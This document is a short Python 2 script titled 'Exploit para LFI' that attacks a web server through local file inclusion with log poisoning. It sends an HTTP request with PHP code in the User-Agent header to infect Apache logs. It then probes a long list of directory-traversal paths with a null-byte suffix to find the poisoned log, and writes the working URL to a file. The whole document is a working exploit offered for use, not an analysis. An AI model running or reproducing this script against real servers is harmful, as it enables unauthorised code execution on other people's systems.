Exploit para LFI

1. import socket, urllib2, string
2. host=raw_input("Host : ")
3. rutarfi=raw_input("Ruta : ")
4. socket = socket.socket()
5. socket.connect((host,80))
6.  
7. print "Conectado"
8. numero=0
9. CRLF ="\r\n"
10. path = "index.html"
11. navegador = "User-Agent:<h1>AQUI</h1> ######<? echo '<h1>Funciono</h1>' ; ?>"
12. cabeceras = "Get "+path+" HTTP/1.1"+CRLF+" Host:"+host+CRLF+navegador+CRLF * 2
13. listalogs = ["../../../../../../../apache/logs/error.log",
14. "../../../../../../../apache/logs/access.log",
15. "../../../../../../../apache/logs/error.log",
16. "../../../../../../../apache/logs/access.log",
17. "../../../../../../../apache/logs/error.log",
18. "../../../../../../../apache/logs/access.log",
19. "../../../../../../../etc/httpd/logs/acces_log",
20. "../../../../../../../etc/httpd/logs/acces.log",
21. "../../../../../../../etc/httpd/logs/error_log",
22. "../../../../../../../etc/httpd/logs/error.log",
23. "../../../../../../../var/www/logs/access_log",
24. "../../../../../../../var/www/logs/access.log",
25. "../../../../../../../usr/local/apache/logs/access_log",
26. "../../../../../../../usr/local/apache/logs/access.log",
27. "../../../../../../../var/log/apache/access_log",
28. "../../../../../../../var/log/apache2/access_log",
29. "../../../../../../../var/log/apache/access.log",
30. "../../../../../../../var/log/apache2/access.log",
31. "../../../../../../../var/log/access_log",
32. "../../../../../../../var/log/access.log",
33. "../../../../../../../var/www/logs/error_log",
34. "../../../../../../../var/www/logs/error.log",
35. "../../../../../../../usr/local/apache/logs/error_log",
36. "../../../../../../../usr/local/apache/logs/error.log",
37. "../../../../../../../var/log/apache/error_log",
38. "../../../../../../../var/log/apache2/error_log",
39. "../../../../../../../var/log/apache/error.log",
40. "../../../../../../../var/log/apache2/error.log",
41. "../../../../../../../var/log/error_log",
42. "../../../../../../../var/log/error.log",
43. "../../../../../var/log/access_log",
44. "../../../../../var/log/access_log"]
45. socket.send(cabeceras)
46. socket.close()
47. print "Logs infectados"
48. print "Buscando el log correcto..."
49.  
50. for log in listalogs:
51. url = "http://"+host+"/"+rutarfi+log+"%00"
52. web = urllib2.urlopen(url)
53. codigo = web.read()
54.  
55. if codigo.find("#####") >= 0:
56. print "Log encontrado\nEscribiendo la url en url.txt"
57. raw_input()
58. archivo=open("url.txt","w")
59. archivo.write(url)
60. archivo.close()
61. exit(1)
62. print "Logs no encontrados "
63. raw_input()